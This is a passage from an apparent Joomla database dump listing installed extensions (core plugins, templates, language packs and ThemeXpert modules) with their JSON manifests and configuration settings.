reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(444,'plg_finder_content','plugin','content','finder',0,1,1,0,'{\"name\":\"plg_finder_content\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(445,'plg_finder_newsfeeds','plugin','newsfeeds','finder',0,1,1,0,'{\"name\":\"plg_finder_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(446,'plg_finder_weblinks','plugin','weblinks','finder',0,1,1,0,'{\"name\":\"plg_finder_weblinks\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(447,'plg_finder_tags','plugin','tags','finder',0,1,1,0,'{\"name\":\"plg_finder_tags\",\"type\":\"plugin\",\"creationDate\":\"February 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(448,'plg_twofactorauth_totp','plugin','totp','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_totp\",\"type\":\"plugin\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_TOTP_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(449,'plg_authentication_cookie','plugin','cookie','authentication',0,1,1,0,'{\"name\":\"plg_authentication_cookie\",\"type\":\"plugin\",\"creationDate\":\"July 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_COOKIE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(450,'plg_twofactorauth_yubikey','plugin','yubikey','twofactorauth',0,0,1,0,'{\"name\":\"plg_twofactorauth_yubikey\",\"type\":\"plugin\",\"creationDate\":\"Se[ptember 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"PLG_TWOFACTORAUTH_YUBIKEY_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(451,'plg_search_tags','plugin','tags','search',0,0,1,0,'{\"name\":\"plg_search_tags\",\"type\":\"plugin\",\"creationDate\":\"March 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"show_tagged_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(500,'atomic','template','atomic','',0,1,1,0,'{\"legacy\":false,\"name\":\"atomic\",\"type\":\"template\",\"creationDate\":\"10\\/10\\/09\",\"author\":\"Ron Severdia\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"contact@kontentdesign.com\",\"authorUrl\":\"http:\\/\\/www.kontentdesign.com\",\"version\":\"2.5.0\",\"description\":\"TPL_ATOMIC_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(502,'bluestork','template','bluestork','',1,1,1,0,'{\"legacy\":false,\"name\":\"bluestork\",\"type\":\"template\",\"creationDate\":\"07\\/02\\/09\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"TPL_BLUESTORK_XML_DESCRIPTION\",\"group\":\"\"}','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\",\"textBig\":\"0\",\"highContrast\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(503,'beez_20','template','beez_20','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez_20\",\"type\":\"template\",\"creationDate\":\"25 November 2009\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ2_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"templatecolor\":\"nature\"}','','',0,'0000-00-00 00:00:00',0,0),(504,'hathor','template','hathor','',1,1,1,0,'{\"name\":\"hathor\",\"type\":\"template\",\"creationDate\":\"May 2010\",\"author\":\"Andrea Tarr\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"hathor@tarrconsulting.com\",\"authorUrl\":\"http:\\/\\/www.tarrconsulting.com\",\"version\":\"3.0.0\",\"description\":\"TPL_HATHOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"showSiteName\":\"0\",\"colourChoice\":\"0\",\"boldText\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(505,'beez5','template','beez5','',0,1,1,0,'{\"legacy\":false,\"name\":\"beez5\",\"type\":\"template\",\"creationDate\":\"21 May 2010\",\"author\":\"Angie Radtke\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"a.radtke@derauftritt.de\",\"authorUrl\":\"http:\\/\\/www.der-auftritt.de\",\"version\":\"2.5.0\",\"description\":\"TPL_BEEZ5_XML_DESCRIPTION\",\"group\":\"\"}','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"html5\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(600,'English (United Kingdom)','language','en-GB','',0,1,1,1,'{\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.3.0\",\"description\":\"en-GB site language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(601,'English (United Kingdom)','language','en-GB','',1,1,1,1,'{\"name\":\"English (United Kingdom)\",\"type\":\"language\",\"creationDate\":\"2013-03-07\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.3.0\",\"description\":\"en-GB administrator language\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(700,'files_joomla','file','joomla','',0,1,1,1,'{\"name\":\"files_joomla\",\"type\":\"file\",\"creationDate\":\"April 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.3.0\",\"description\":\"FILES_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10021,'PKG_JOOMLA','package','pkg_joomla','',0,1,1,1,'{\"legacy\":false,\"name\":\"PKG_JOOMLA\",\"type\":\"package\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"PKG_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10049,'System - Expose','plugin','expose','system',0,1,1,0,'{\"legacy\":false,\"name\":\"System - Expose\",\"type\":\"plugin\",\"creationDate\":\"Nove 01, 2011\",\"author\":\"ThemeXpert\",\"copyright\":\"(C) 2010 - 2011 ThemeXpert. All rights reserved.\",\"authorEmail\":\"support@themexpert.com\",\"authorUrl\":\"http:\\/\\/www.themexpert.com\",\"version\":\"3.0\",\"description\":\"Expose System Plugin for Joomla 2.5\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10067,'com_joomlaupdate','component','com_joomlaupdate','',1,1,1,0,'{\"legacy\":false,\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{\"updatesource\":\"sts\",\"customurl\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10068,'mod_unread','module','mod_unread','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_unread\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2011 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"1.6.0\",\"description\":\"MOD_UNREAD_XML_DESCRIPTION\",\"group\":\"\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(10079,'hu-HU','package','pkg_hu-HU','',0,1,1,0,'{\"legacy\":false,\"name\":\"Hungarian Language Pack (formal)\",\"type\":\"package\",\"creationDate\":\"2013.10.15\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"\",\"authorUrl\":\"\",\"version\":\"2.5.14.1\",\"description\":\"Joomla! 2.5.14.1 Hungarian Language Package in formal style translated by Joomla! User Association Hungary\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10083,'Xpert Accordion','module','mod_xpertaccordion','',0,1,0,0,'{\"legacy\":false,\"name\":\"Xpert Accordion\",\"type\":\"module\",\"creationDate\":\"${build.date}\",\"author\":\"ThemeXpert\",\"copyright\":\"Copyright (C) 20010 - 2011 ThemeXpert. All rights reserved.\",\"authorEmail\":\"support@themexpert.com\",\"authorUrl\":\"www.themexpert.com\",\"version\":\"1.0-3-G424E763\",\"description\":\"Responsive accordion module support Joomla, K2. Brought to you by ThemeXpert\",\"group\":\"\"}','{\"content_source\":\"joomla\",\"count\":\"3\",\"intro\":\"1\",\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"theme\":\"elegant\",\"load_jquery\":\"1\",\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\",\"moduleclass_sfx\":\"\",\"jomcatfilter\":\"0\",\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":\"0\",\"k2_catid\":\"\",\"k2_get_children\":\"1\",\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10098,'Xpert Tabs','module','mod_xperttabs','',0,1,0,0,'{\"legacy\":false,\"name\":\"Xpert Tabs\",\"type\":\"module\",\"creationDate\":\"${build.date}\",\"author\":\"ThemeXpert\",\"copyright\":\"(C) 2008 - 2011 ThemeXpert, LLC. All rights reserved.\",\"authorEmail\":\"support@themexpert.com\",\"authorUrl\":\"http:\\/\\/www.themexpert.com\",\"version\":\"3.7\",\"description\":\"Xpert Tabs, Next Generation Tab Module For Joomla! designed to show section articles and modules in a pleasing format.Brought to you by ThemeXpert\",\"group\":\"\"}','{\"content_source\":\"joomla\",\"count\":\"5\",\"tabs_position\":\"top\",\"tabs_interaction\":\"click\",\"tabs_title_type\":\"content\",\"tabs_title_custom\":\"Tab Title1, Tab Title2, Tab Title3\",\"intro_limit_type\":\"0\",\"intro_limit\":\"30\",\"readmore\":\"1\",\"readmore_label\":\"Read More\",\"routing_type\":\"default\",\"menuitemid\":\"\",\"mod_style\":\"style1\",\"transition\":\"fade-slide\",\"jomcatfilter\":\"0\",\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":\"0\",\"k2_catid\":\"\",\"k2_get_children\":\"1\",\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\",\"moduleclass_sfx\":\"\",\"auto_module_id\":\"1\",\"module_unique_id\":\"xs_1\",\"load_jquery\":\"1\",\"jquery_source\":\"local\",\"cache\":\"0\",\"cache_time\":\"900\"}','','',0,'0000-00-00 00:00:00',0,0),(10112,'HungarianMagyar','language','hu-HU','',0,1,0,0,'{\"legacy\":false,\"name\":\"Hungarian (Magyar)\",\"type\":\"language\",\"creationDate\":\"2013-10-15\",\"author\":\"Magyar Joomla! Felhaszn\\u00e1l\\u00f3k Nemzetk\\u00f6zi Egyes\\u00fclete\",\"copyright\":\"Copyright (C) 2007 - 2012 Magyar Joomla! Felhaszn\\u00e1l\\u00f3k Nemzetk\\u00f6zi Egyes\\u00fclete. All rights reserved.\",\"authorEmail\":\"info@joomla.org.hu\",\"authorUrl\":\"www.joomla.org.hu\",\"version\":\"2.5.14.1\",\"description\":\"Hungarian formal language pack for Joomla! 2.5.14, translated by Joomla! User Association Hungary\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10113,'HungarianMagyar','language','hu-HU','',1,1,0,0,'{\"legacy\":false,\"name\":\"Hungarian (Magyar)\",\"type\":\"language\",\"creationDate\":\"2013-10-15\",\"author\":\"Magyar Joomla! Felhaszn\\u00e1l\\u00f3k Nemzetk\\u00f6zi Egyes\\u00fclete\",\"copyright\":\"Copyright (C) 2007 - 2012 Magyar Joomla! Felhaszn\\u00e1l\\u00f3k Nemzetk\\u00f6zi Egyes\\u00fclete. All rights reserved.\",\"authorEmail\":\"info@joomla.org.hu\",\"authorUrl\":\"www.joomla.org.hu\",\"version\":\"2.5.14.1\",\"description\":\"Hungarian formal language pack for Joomla! 2.5.14, translated by Joomla! User Association Hungary\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10114,'Expose Templaet Framework for Joomla 2.5','library','lib_expose','',0,1,1,0,'{\"legacy\":false,\"name\":\"Expose Templaet Framework for Joomla 2.5\",\"type\":\"library\",\"creationDate\":\"11\\/28\\/2013\",\"author\":\"ThemeXpert\",\"copyright\":\"Copyright (C) 2010 - 2013 ThemeXpert\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/themexpert.com\\/\",\"version\":\"4.2.3\",\"description\":\"Expose is a flexible and powerful rapid development theme framework for joomla 2.5 and 3.x with a very small footprint provides an extensible environment for developing, maintaining, and deploying high quality themes. Choosing Expose allows you to release your themes earlier, host and scale them without problem, and maintain them over time with no hassle.\\n \",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10118,'Tx_Zenith_II','template','tx_zenith_ii','',0,1,1,0,'{\"legacy\":false,\"name\":\"Tx_Zenith_II\",\"type\":\"template\",\"creationDate\":\"03\\/09\\/2014\",\"author\":\"ThemeXpert.com\",\"copyright\":\"Copyright (C) 2010 - 2014 ThemeXpert. All Rights Reserved.\",\"authorEmail\":\"support@themexpert.com\",\"authorUrl\":\"http:\\/\\/www.themexpert.com\",\"version\":\"1.0\",\"description\":\"EXPOSE_DESCRIPTION\",\"group\":\"\"}','{\"style\":\"blue\",\"stylus-enabled\":\"0\",\"stylus-module-title-color\":\"f2560e\",\"stylus-article-title-color\":\"5bd954\",\"stylus-background-color\":\"fffff\",\"stylus-background-image\":\"ffffff\",\"stylus-background-image-repeat\":\"repeat\",\"stylus-header-bg-color\":\"555555\",\"stylus-header-text-color\":\"555555\",\"stylus-header-link-color\":\"bada55\",\"stylus-header-link-hover-color\":\"f2560e\",\"stylus-header-image-repeat\":\"repeat\",\"stylus-top-bg-color\":\"555555\",\"stylus-top-text-color\":\"555555\",\"stylus-top-link-color\":\"bada55\",\"stylus-top-link-hover-color\":\"f2560e\",\"stylus-top-image-repeat\":\"repeat\",\"stylus-feature-bg-color\":\"dddddd\",\"stylus-feature-text-color\":\"555555\",\"stylus-feature-link-color\":\"f2560e\",\"stylus-feature-link-hover-color\":\"3d3a38\",\"stylus-feature-image-repeat\":\"repeat\",\"stylus-maincontent-bg-color\":\"dddddd\",\"stylus-maincontent-text-color\":\"555555\",\"stylus-maincontent-link-color\":\"f2560e\",\"stylus-maincontent-link-hover-color\":\"3d3a38\",\"stylus-maincontent-image-repeat\":\"repeat\",\"stylus-bottom-bg-color\":\"eeeeee\",\"stylus-bottom-text-color\":\"222222\",\"stylus-bottom-link-color\":\"0ea8f0\",\"stylus-bottom-link-hover-color\":\"0ea8f0\",\"stylus-bottom-image-repeat\":\"repeat\",\"stylus-footer-bg-color\":\"000000\",\"stylus-footer-text-color\":\"ffffff\",\"stylus-footer-link-color\":\"30a8f4\",\"stylus-footer-link-hover-color\":\"30a8f4\",\"stylus-footer-image-repeat\":\"repeat\",\"logo-enabled\":\"1\",\"logo-type\":\"image\",\"logo-text\":\"Expose Framework for Joomla 2.5 and 3.0+\",\"logo-position\":\"top-1\",\"logo-mobile\":\"1\",\"logo-display-tagline\":\"0\",\"date-enabled\":\"0\",\"date-position\":\"roof-1\",\"date-formats\":\"\",\"copyrightinfo-enabled\":\"1\",\"copyrightinfo-position\":\"copyright-1\",\"copyrightinfo-text\":\"EXPOSE_DEFAULT_COPYRIGHT\",\"copyrightinfo-mobile\":\"0\",\"fontresizer-enabled\":\"0\",\"fontresizer-position\":\"roof-5\",\"fontresizer-selector\":\"body\",\"totop-enabled\":\"1\",\"totop-position\":\"absolute\",\"wordformat-enabled\":\"0\",\"wordformat-selector\":\"header h2 a\",\"lazyloader-enabled\":\"1\",\"modernizr-enabled\":\"0\",\"exposelogo-enabled\":\"1\",\"exposelogo-type\":\"light\",\"exposelogo-position\":\"copyright-1\",\"analytics-enabled\":\"0\",\"analytics-id\":\"UA-xxxxxx-x\",\"social-enabled\":\"1\",\"social-position\":\"top-5\",\"social-twitter\":\"http:\\/\\/www.twitter.com\\/ThemeXpert\",\"social-facebook\":\"http:\\/\\/www.facebook.com\\/ThemeXpert\",\"designedby-enabled\":\"1\",\"designedby-position\":\"copyright-1\",\"equalheight-enabled\":\"1\",\"pagetitle-enabled\":\"1\",\"pagetitle-position\":\"subheader-1\",\"menu-enabled\":\"1\",\"menu-style\":\"mega\",\"menutype\":\"mainmenu\",\"menu-position\":\"top-2\",\"menu-animation\":\"scale-up\",\"menu-animation-sublevel\":\"slide-right\",\"menu-startlevel\":\"1\",\"menu-endlevel\":\"-1\",\"splitmenu-title\":\"1\",\"splitmenu-title-text\":\"Sub Menu\",\"splitmenu-style\":\"vertical\",\"splitmenu-position\":\"sidebar-b\",\"offcanvas-startlevel\":\"1\",\"offcanvas-endlevel\":\"3\",\"responsive-enabled\":\"1\",\"layouts\":\"sidebara-content-sidebarb\",\"sidebar-a\":\"1:3\",\"sidebar-a-chrome\":\"sidebar-a:standard\",\"sidebar-b\":\"1:3\",\"sidebar-b-chrome\":\"sidebar-b:standard\",\"roof\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"roof-chrome\":\"roof-1:standard,roof-2:standard,roof-3:standard,roof-4:standard,roof-5:standard,roof-6:standard\",\"top\":\"1:12,2:3,2:9,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"top-chrome\":\"top-1:standard,top-2:standard,top-3:standard,top-4:standard,top-5:standard,top-6:standard\",\"header\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"header-chrome\":\"header-1:standard,header-2:standard,header-3:standard,header-4:standard,header-5:standard,header-6:standard\",\"utility\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"utility-chrome\":\"utility-1:standard,utility-2:standard,utility-3:standard,utility-4:standard,utility-5:standard,utility-6:standard\",\"feature\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"feature-chrome\":\"feature-1:standard,feature-2:standard,feature-3:standard,feature-4:standard,feature-5:standard,feature-6:standard\",\"maintop\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"maintop-chrome\":\"maintop-1:standard,maintop-2:standard,maintop-3:standard,maintop-4:standard,maintop-5:standard,maintop-6:standard\",\"contenttop\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3\",\"contenttop-chrome\":\"contenttop-1:standard,contenttop-2:standard,contenttop-3:standard,contenttop-4:standard\",\"contentbottom\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3\",\"contentbottom-chrome\":\"contentbottom-1:standard,contentbottom-2:standard,contentbottom-3:standard,contentbottom-4:standard\",\"mainbottom\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"mainbottom-chrome\":\"mainbottom-1:standard,mainbottom-2:standard,mainbottom-3:standard,mainbottom-4:standard,mainbottom-5:standard,mainbottom-6:standard\",\"bottom\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"bottom-chrome\":\"bottom-1:standard,bottom-2:standard,bottom-3:standard,bottom-4:standard,bottom-5:standard,bottom-6:standard\",\"footer\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"footer-chrome\":\"footer-1:standard,footer-2:standard,footer-3:standard,footer-4:standard,footer-5:standard,footer-6:standard\",\"copyright\":\"1:12,2:6,2:6,3:4,3:4,3:4,4:3,4:3,4:3,4:3,5:3,5:2,5:2,5:2,5:3,6:2,6:2,6:2,6:2,6:2,6:2\",\"copyright-chrome\":\"copyright-1:standard,copyright-2:standard,copyright-3:standard,copyright-4:standard,copyright-5:standard,copyright-6:standard\",\"absolute\":\"1:12\",\"absolute-chrome\":\"absolute:raw\",\"breadcrumbs\":\"1:12\",\"breadcrumbs-chrome\":\"breadcrumbs:standard\",\"offcanvas\":\"1:12\",\"offcanvas-chrome\":\"offcanvas:raw\",\"webfonts-body-font\":\"0\",\"webfonts-body-selectors\":\"body\",\"webfonts-menu-font\":\"0\",\"webfonts-menu-selectors\":\"#menu a\",\"webfonts-heading-font\":\"0\",\"webfonts-heading-selectors\":\"h1,h3\",\"webfonts-module-font\":\"0\",\"webfonts-module-selectors\":\".title\",\"jquery-enabled\":\"1\",\"jquery-source\":\"local\",\"jquery-version\":\"1.8.3\",\"combined-css\":\"0\",\"minify-css\":\"0\",\"combined-js\":\"0\",\"minify-js\":\"0\",\"cache-time\":\"2400\",\"component-disable\":\"0\",\"component-disable-menu-ids\":\"101\",\"rtl-support\":\"0\",\"remove-joomla-metainfo\":\"0\",\"disable-mootools\":\"0\",\"less-enabled\":\"0\",\"less-compression\":\"compressed\"}','','',0,'0000-00-00 00:00:00',0,0),(10119,'build','plugin','build','system',0,1,1,0,'false','','','',0,'0000-00-00 00:00:00',0,-1),(10128,'Xpert Gallery','module','mod_xpertgallery','',0,1,0,0,'{\"legacy\":false,\"name\":\"Xpert Gallery\",\"type\":\"module\",\"creationDate\":\"${build.date}\",\"author\":\"ThemeXpert\",\"copyright\":\"Copyright (C) 20010 - 2011 ThemeXpert. All rights reserved.\",\"authorEmail\":\"support@themexpert.com\",\"authorUrl\":\"www.themexpert.com\",\"version\":\"2.0-1-G0B6E583\",\"description\":\"\",\"group\":\"\"}','{\"content_source\":\"joomla\",\"count\":\"6\",\"column\":\"3\",\"sort_enabled\":\"1\",\"sort_elements\":\"default,title,date,random\",\"overview\":\"1\",\"overview_elements\":\"title,intro\",\"intro\":\"1\",\"intro_limit_type\":\"words\",\"intro_limit\":\"30\",\"image_resize\":\"1\",\"image_width\":\"490\",\"image_height\":\"390\",\"jomcatfilter\":\"1\",\"jom_ordering\":\"p_dsc\",\"jom_user_id\":\"0\",\"jom_show_featured\":\"\",\"k2_catfilter\":\"1\",\"k2_catid\":\"\",\"k2_get_children\":\"1\",\"k2_items_ordering\":\"\",\"k2_featured_items\":\"1\",\"k2_popularity_range\":\"\",\"moduleclass_sfx\":\"\",\"auto_module_id\":\"1\",\"module_unique_id\":\"xs_1\",\"load_jquery\":\"1\",\"jquery_source\":\"local\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}','','',0,'0000-00-00 00:00:00',0,0),(10132,'lib_xef','library','lib_xef','',0,1,1,0,'{\"legacy\":false,\"name\":\"lib_xef\",\"type\":\"library\",\"creationDate\":\"03\\/16\\/2014\",\"author\":\"Parvez Akther\",\"copyright\":\"Copyright (C) 2011 - 2011 ThemeXpert\",\"authorEmail\":\"parvez@themexpert.com\",\"authorUrl\":\"http:\\/\\/themexpert.com\\/\",\"version\":\"1.4.1\",\"description\":\"\\n ThemeXpert Extension Framework (XEF) \\u2013 A rapid extension development framework for all ThemeXpert extensions.\\n \",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10133,'User - EasyBlog Users','plugin','easyblogusers','user',0,1,1,0,'','','','',0,'0000-00-00 00:00:00',0,0),(10135,'User - EasyDiscuss Users','plugin','easydiscussusers','user',0,1,1,0,'{\"legacy\":true,\"name\":\"User - EasyDiscuss Users\",\"type\":\"plugin\",\"creationDate\":\"22 February 2011\",\"author\":\"StackIdeas\",\"copyright\":\"Copyright 2009 - 2011 StackIdeas. All rights reserved.\",\"authorEmail\":\"support@stackideas.com\",\"authorUrl\":\"http:\\/\\/www.stackideas.com\",\"version\":\"1.1.1\",\"description\":\"EasyDiscuss user plugin. This plugin is responsible to delete user\'s related records such as question post, reply and etc.\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(10137,'isis','template','isis','',1,1,1,0,'{\"name\":\"isis\",\"type\":\"template\",\"creationDate\":\"3\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_ISIS_XML_DESCRIPTION\",\"group\":\"\"}','{\"templateColor\":\"\",\"logoFile\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(10138,'protostar','template','protostar','',0,1,1,0,'{\"name\":\"protostar\",\"type\":\"template\",\"creationDate\":\"4\\/30\\/2012\",\"author\":\"Kyle Ledbetter\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"\",\"version\":\"1.0\",\"description\":\"TPL_PROTOSTAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}','','',0,'0000-00-00 